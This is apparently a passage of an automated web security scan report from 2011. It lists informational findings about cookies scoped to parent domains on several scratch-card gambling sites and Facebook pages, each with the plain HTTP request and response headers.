GET /Terms.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:04 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 109507

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.97. http://www.bigmoneyscratch.com/UnderAge.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigmoneyscratch.com
Path:	/UnderAge.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_12=EncryptedUniqueVisitorID=221D36A4955B6C06841250648788A96C&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=12; ASP.NET_SessionId=d1so5b551ijeobbe4bfxso45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:07:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: UniqueVisitorID=221D36A4955B6C06841250648788A96C; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:07:36 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.98. http://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
lsd=szS-2; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

11.99. http://www.facebook.com/PrimeScratchCards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/PrimeScratchCards

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
lsd=ci4lk; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.100. http://www.facebook.com/WinningsCom previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/WinningsCom

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
lsd=V8GN3; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WinningsCom?id=tb HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OhnRTeSZjl5Fn1flFpG8JJU9; expires=Wed, 15-May-2013 12:31:54 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=V8GN3; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.102.57
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 41751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.101. http://www.facebook.com/crazyscratch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/crazyscratch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
lsd=HCAHZ; path=/; domain=.facebook.com
reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /crazyscratch HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTUnjv0Wq3vp7H5Lg8kQU; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=HCAHZ; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcrazyscratch; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.134.58
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 40706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

11.102. http://www.facebook.com/pages/BigMoneyScratch/156518521055171 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/BigMoneyScratch/156518521055171

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=OxnRTQnBh8OpqRjSzWcXKlvK; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
lsd=7uzqb; path=/; domain=.facebook.com
next=http%3A%2F%2Fwww.facebook.com%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
next_path=%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/BigMoneyScratch/156518521055171 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTQnBh8OpqRjSzWcXKlvK; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=7uzqb; path=/; domain=.facebook.com
Set-Cookie: next=http%3A%2F%2Fwww.facebook.com%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Set-Cookie: next_path=%2Fpages%2FBigMoneyScratch%2F156518521055171; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.38.33
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 0

11.103. http://www.facebook.com/pages/PrimeScratchCards/122783514413813 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/PrimeScratchCards/122783514413813

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=PBnRTVS0-zB1xKJnbwFkgEiW; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
lsd=DEbk9; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pages/PrimeScratchCards/122783514413813 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Location: http://www.facebook.com/PrimeScratchCards
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTVS0-zB1xKJnbwFkgEiW; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=DEbk9; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.90.55
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 0

11.104. http://www.facebook.com/peoplespostcodelottery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peoplespostcodelottery

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
lsd=1P6PH; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /peoplespostcodelottery HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PBnRTUnMC-QzxdCoW9pJpTTF; expires=Wed, 15-May-2013 12:31:56 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=1P6PH; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.53.64
Connection: close
Date: Mon, 16 May 2011 12:31:56 GMT
Content-Length: 36902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

11.105. http://www.hopa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.hopa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CSI_4=EncryptedUniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CountryCode=US; CSITemp=4; ASP.NET_SessionId=e01kb5453bgwt555nikmx12o;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: UniqueVisitorID=B7E205F9FF290BAED7305BD74C2DA067; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 12:10:19 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.106. http://www.hopa.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hopa.com
Path:	/visit.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

CSI_4=EncryptedUniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=hopa.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
UniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /visit.aspx?csi=10&CorID=&SentDate=&CorExpTime=& HTTP/1.1
Host: www.hopa.com
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 11:41:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Set-Cookie: ASP.NET_SessionId=nfixaxv3hvxxgxi1a4r3yqyy; path=/; HttpOnly
Set-Cookie: CSI_4=EncryptedUniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58&AffiliateID=4&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=hopa.com; expires=Fri, 16-May-2031 11:41:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: BO=FM; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: UniqueVisitorID=EEACA8F7E2BB877FE832932388F7EA58; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=hopa.com; expires=Fri, 16-May-2014 11:41:38 GMT; path=/
Set-Cookie: CSITemp=4; domain=hopa.com; path=/
Vary: Accept-Encoding
Content-Length: 131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

11.107. http://www.info.crazyscratch.com/AboutUs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/AboutUs.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AboutUs.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:39 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57114

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.108. http://www.info.crazyscratch.com/ContactUsFax.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsFax.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsFax.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:35 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 54673

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.109. http://www.info.crazyscratch.com/ContactUsMail.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsMail.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsMail.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:19 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62131

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

11.110. http://www.info.crazyscratch.com/ContactUsTel.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.info.crazyscratch.com
Path:	/ContactUsTel.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:32 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ContactUsTel.aspx HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
